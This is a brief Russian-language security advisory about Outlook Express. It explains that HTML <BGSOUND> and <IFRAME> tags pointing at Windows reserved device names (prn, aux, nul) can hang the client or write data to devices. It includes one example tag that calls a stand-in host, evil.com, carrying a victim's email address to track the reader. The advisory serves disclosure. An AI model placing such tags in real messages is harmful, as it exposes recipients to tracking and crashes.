Во всех версиях Windows есть зарезервированные имена файлов, которые относятся к специальным устройствам (DOS-устройства), такие как prn, aux, nul и т.д. Имя устройства не зависит от пути к каталогу, расширения файла и т.д. (т.е. c:\temp\prn.tmp является специальным устройством prn). Для работы со специальными устройствами применяется тот же API что и для работы с обычными файлами. Несанкционированный доступ к специальным устройствам может привести к различным неприятным последствиям
- начиная с некорректной работы службы или программы, производящей попытку доступа к файлу и заканчивая повреждением физического устройства или
потерей важных данных.
Описание проблемы:
ERRor обнаружил, что с помощью тэга <BGSOUND> в сочетании со специальным именем устройства можно вызвать зависание Outlook Express. При этом возвращение программы в рабочее состояние без потери архива писем является нетривиальной задачей.
Во время исследования этой проблемы было выявлено, что с помощью тэга <IFRAME> можно послать любые данные в специальное устройство.
Так же проблемой является то, что исходный файл тэга <BGSOUND> загружается всегда и
с любого сайта, независимо от установок зоны безопасности. Это делает возможным "регистрацию" клиента с помощью <bgsound
src="http://evil.com/registerme?email=victim@com.com">.
Microsoft был проинформирован ?? апреля 2002 года. Не было получено сообщений по данной проблеме с 25 апреля.
Ссылки:
